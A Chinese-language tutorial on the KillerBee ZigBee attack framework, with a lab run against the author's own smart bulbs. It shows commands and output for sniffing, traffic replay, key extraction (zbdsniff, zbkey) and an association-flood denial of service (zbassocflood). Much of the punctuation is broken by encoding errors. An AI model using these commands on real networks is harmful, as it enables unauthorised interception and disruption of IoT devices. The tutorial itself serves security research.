KillBee框架的使用方法
發(fā)布時(shí)間:2021-08-23 15:12
來(lái)源:億速云
閱讀:0
作者:chen
欄目: 網(wǎng)絡(luò )安全
這篇文章主要介紹“KillBee框架的使用方法”����,在日常操作中���,相信很多人在KillBee框架的使用方法問(wèn)題上存在疑惑�����,小編查閱了各式資料��,整理出簡(jiǎn)單好用的操作方法�,希望對大家解答”KillBee框架的使用方法”的疑惑有所幫助��!接下來(lái)�����,請跟著(zhù)小編一起來(lái)學(xué)習吧���!
KillerBee框架
KillerBee攻擊框架���,KillerBee是針對ZigBee和IEEE 802.15.4網(wǎng)絡(luò )的框架和安全研究工具���。
框架要求
KillerBee目前僅支持Linux系統�。在安裝之前必須安裝以下Python模塊���。在Ubuntu系統上�,可以使用以下命令安裝所需的依賴(lài)項:
# apt-get install python-gtk2 python-cairo python-usb python-crypto python-serial python-dev libgcrypt-dev
# git clone https://github.com/secdev/scapy
# cd scapy
# python setup.py install
注:KillerBee是一個(gè)強大但并不“友好”的測試平臺���,它主要是為開(kāi)發(fā)人員和高級分析專(zhuān)家服務(wù)的�,所以在此之前建議大家先了解一下ZigBee協(xié)議����。
安裝KillerBee
KillerBee使用標準的Python “setup.py” 安裝文件����。使用以下命令安裝KillerBee:
# python setup.py install
目錄結構
KillerBee代碼的目錄結構描述如下:
doc - KillerBee庫中的HTML文檔��,由epydoc提供����。
firmware - 支持的KillerBee硬件設備的固件����。
killerbee - Python庫源代碼���。
sample - 樣本數據包捕獲��,在下面引用��。
scripts - 開(kāi)發(fā)中使用的Shell腳本��。
tools - 使用此框架開(kāi)發(fā)的ZigBee和IEEE 802.15.4攻擊工具����。
硬件要求
KillerBee框架目前支持多款設備�����,包括River Loop ApiMote�����、Atmel RZ RAVEN無(wú)線(xiàn)電收發(fā)器�、MoteIVTmote Sky�����、TelosB mote���、Sewino嗅探器和運行Silicon Labs Node Test固件的各種硬件�。簡(jiǎn)單介紹其中三種硬件設備:
ApiMote v4 beta:Beta版目前支持嗅探����,注入和阻塞����。
工具介紹
KillerBee包括多種工具��,用于攻擊使用KillerBee框架構建的ZigBee和IEEE 802.15.4網(wǎng)絡(luò )����。通過(guò)“ -h”參數可以查看詳細的使用說(shuō)明����,在下面進(jìn)行了概述����。
zbid - 標識KillerBee和關(guān)聯(lián)工具可以使用的可用接口��。
zbwireshark - 與zbdump相似���,但是公開(kāi)了一個(gè)命名管道��,以便在Wireshark中進(jìn)行實(shí)時(shí)捕獲和查看�����。
zbdump - 類(lèi)似tcpdump的功能�����,用于捕獲ibpcap數據包文件���。它可以以pcap和Daintree格式保存數據包����。
zbreplay - 實(shí)施重放攻擊����,從指定的Daintree DCF或libpcap數據包捕獲文件中讀取數據����,然后重新傳輸幀���。ACK幀不會(huì )重新發(fā)送�����。
zbstumbler - 激活ZigBee和IEEE 802.15.4網(wǎng)絡(luò )發(fā)現工具�。Zbstumbler發(fā)送信標請求幀����,同時(shí)跳頻��,記錄和顯示有關(guān)已發(fā)現設備的摘要信息���。
zbdsniff - 捕獲ZigBee流量�����,查找NWK幀和無(wú)線(xiàn)密鑰配置���。找到密鑰后�,zbdsniff會(huì )將密鑰打印到stdout�。
zbkey - 嘗試向協(xié)調器發(fā)送連接請求獲取密鑰��。
zbconvert - 將數據包捕獲從Libpcap轉換為Daintree SNA格式��,反之亦然��。
zbfind - 一個(gè)GTK GUI應用程序��,用于通過(guò)測量RSSI來(lái)跟蹤IEEE 802.15.4發(fā)射機的位置��。
bscapy - 提供一個(gè)交互式的Scapy shell���,用于通過(guò)KillerBee界面進(jìn)行交互���。必須安裝Scapy才能運行此功能��。
框架介紹
KillerBee主要用于針對數據包捕獲文件(libpcap或Daintree SNA)中嗅探數據包的過(guò)程��,并用于注入任意數據包�����。包括IEEE 802.15.4���,ZigBee NWK和ZigBee APS數據包解碼器在內的輔助功能也可用�。
KillerBee API以epydoc格式記錄���,此發(fā)行版的doc/目錄中包含HTML文檔���。如果已安裝epydoc�,則還可以根據需要生成一個(gè)方便的PDF進(jìn)行打印��,如下所示:
$ cd killerbee
$ mkdir pdf
$ epydoc --pdf -o pdf killerbee/
pdf/ 目錄將包含一個(gè)名為“api.pdf”的文件�����,其中包括框架文檔��。
由于KillerBee是一個(gè)Python庫�,因此它集成了其他Python軟件�。例如�����,Sulley庫是由Pedram Amini用Python編寫(xiě)的模糊測試框架�。KillerBee框架使用它來(lái)數據包注入功能�,用于生成格式不正確的ZigBee數據并將其傳輸到目標����。
ZigBee流量分析
ZigBee網(wǎng)絡(luò )環(huán)境
搭建ZigBee協(xié)議通信的智能燈泡系統�����,一共四個(gè)終端設備(RGB燈�,分為1�����、2�、3�����、4號)以及ZigBee協(xié)調器用于與每個(gè)終端設備(燈)網(wǎng)絡(luò )通信����。
使用ApiMote
在樹(shù)莓派環(huán)境下�����,根據前面的介紹安裝好KillerBee框架以后��,下面開(kāi)始用手上的ApiMote硬件設備進(jìn)行ZigBee流量的分析測試�。
ApiMote連接樹(shù)莓派以后���,會(huì )自動(dòng)檢測到ApiMote(ID 0403:6015)并加載驅動(dòng)程序��。
root@raspberrypi:/home/pi/Desktop# lsusb
Bus 001 Device 005: ID 0403:6015 Future Technology Devices International, Ltd Bridge(I2C/SPI/UART/FIFO)
Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp. SMSC9512/9514 Fast Ethernet Adapter
Bus 001 Device 002: ID 0424:9514 Standard Microsystems Corp. SMC9514 Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
ApiMote通常會(huì )預裝好固件�����,不需要重新刷寫(xiě)�����。若需要刷寫(xiě)固件��,步驟如下:
在 firware/ 目錄下包含多種設備的固件����,選擇ApiMote的固件apimotev4_202011.hex
運行flash_apimote.sh腳本�,如果第一次不同步而超時(shí)�,有時(shí)可能需要兩次嘗試才能正確閃爍���。
可以通過(guò)運行sudo zbid來(lái)驗證固件�,并列出設備�。
root@raspberrypi:/home/pi/Desktop# zbid
Dev Product String Serial Number
/dev/ttyUSB1 GoodFET Api-Mote v2
嗅探數據包
zbwireshark允許用戶(hù)在Wireshark中實(shí)時(shí)嗅探和查看ZigBee流量�。該工具創(chuàng )建一個(gè)管道�,Wireshark然后從中讀取數據�,并實(shí)時(shí)顯示出來(lái)�。
root@raspberrypi:/home/pi/Desktop# zbwireshark -f 15
zbwireshark: listening on '/dev/ttyUSB1', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes
-f 參數指定第 15 信道���。
也可以使用 zbdump以pcap和DainTree格式嗅探并保存數據包��。這里我們以pcap格式��,以便使用wireshark打開(kāi)分析協(xié)議�,下面運行zbdump�����,同樣使用 -f 指定信道�。
root@raspberrypi:/home/pi/Desktop# zbdump -f 15 -w test.pcap
zbdump: listening on '/dev/ttyUSB1', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes
^C
54 packets captured
使用wireshark打開(kāi)捕獲的數據包
數據包中���,捕獲的源和目的地址被分配了網(wǎng)絡(luò )ID�����,例如
重放ZigBee流量
通過(guò)捕獲設備的數據包����,然后將該流量進(jìn)行重播回設備�����。
zbdump剛剛使用過(guò)此工具將流量保存到數據包文件中��,接下來(lái)使用zbreply工具����,將從zbdump獲取的pcap文件���,通過(guò)ApiMote對其重播��。
-f 參數指定信道��,-w 參數指定用于寫(xiě)入捕獲的數據包的pcap文件�,-r指定用于讀取捕獲的數據包的pcap文件��。
root@raspberrypi:/home/pi/Desktop# zbdump -f 15 -w operating.pcap
zbdump: listening on '/dev/ttyUSB0', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes
^C
61 packets captured
root@raspberrypi:/home/pi/Desktop# zbreplay -f 15 -r operating.pcap
zbreplay: retransmitting frames from 'operating.pcap' on interface '/dev/ttyUSB0' with a delay of 1.0 seconds.
34 packets transmitted
嗅探密鑰
zbdsniff工具可以從ZigBee網(wǎng)絡(luò )抓取的流量數據包pcap文件中發(fā)現明文的密鑰key����,并返回key��。
root@raspberrypi:/home/pi/Desktop# zbdsniff -f operating.pcap -k c028128de295be0708aebe9eed
Processing operating.pcap
[+] Processed 1 capture files.
但是我沒(méi)有從文件中得到任何輸出�����,可能沒(méi)有找到可用的key��。
zbkey與 zbdsniff 目的相似�,不同的是 zbkey 會(huì )向協(xié)調器發(fā)送連接���,然后發(fā)送數據請求來(lái)檢索獲取密鑰��,而不是掃描pcap文件���。-f 參數指定信道���,-s 定時(shí)�����,-p 參數指定 PAN ID��,-a 參數指定ZigBee硬件地址�����。但是沒(méi)有返回成功��。
root@raspberrypi:/home/pi/Desktop# zbkey -f 15 -s 0.1 -p d85b -a 00124b0022305e4b
Sending association packet...
Sending data request packet...
Received frame .^
Length of packet received in associate_handle: 54
0000: 61 88 ac 5b d8 c4 10 00 00 08 02 c4 10 00 00 1e a..[............
0010: 81 28 49 b4 09 00 3a a9 da fe ff 27 71 84 00 ce .(I...:....'q...
0020: 8c 9f 39 98 2e 26 f8 2c d1 54 ca 0a d9 2d fb 6c ..9..&.,.T...-.l
0030: 06 82 e3 29 03 00 ...)..
Received frame
Length of packet received in associate_handle: 50
0000: 61 88 cd 5b d8 08 0c a2 c4 08 02 08 0c 00 00 1d a..[............
0010: 85 28 47 99 02 00 4b 5e 30 22 00 4b 12 00 00 b5 .(G...K^0".K....
0020: a9 58 f8 e2 96 ed ab 4f 9b 50 76 b4 99 d2 99 1a .X.....O.Pv.....
0030: 09 d1 ..
Received frame
Length of packet received in associate_handle: 5
0000: 02 00 af 45 e8 ...E.
Sorry, we didn't hear a device respond with an association response. Do you have an active target within range?
拒絕服務(wù)攻擊
KillerBee 框架提供了 zbassocflood工具�����,該工具嘗試將大量關(guān)聯(lián)請求發(fā)送到目標網(wǎng)絡(luò )��。需要PAN ID(-p)����,信道(-c)和定時(shí)(-s)�。
root@raspberrypi:/home/pi/Desktop# zbassocflood -p d85b -c 15 -s 0.1
zbassocflood: Transmitting and receiving on interface '/dev/ttyUSB0'
.............
^C
Sent 13 associate requests.
KillerBee的攻擊方式大致分為���,發(fā)現設備(zbstumbler���、zbopenear�����、zbfind)�,嗅探流量(zbdump��、zbwireshark)���,獲取密鑰(zbdsniff���、zbkey���、zbgoodfind)����,重放流量(zbscapy��、zbreplay)�,拒絕服務(wù)(zbscapy����、zbassocflood)�。
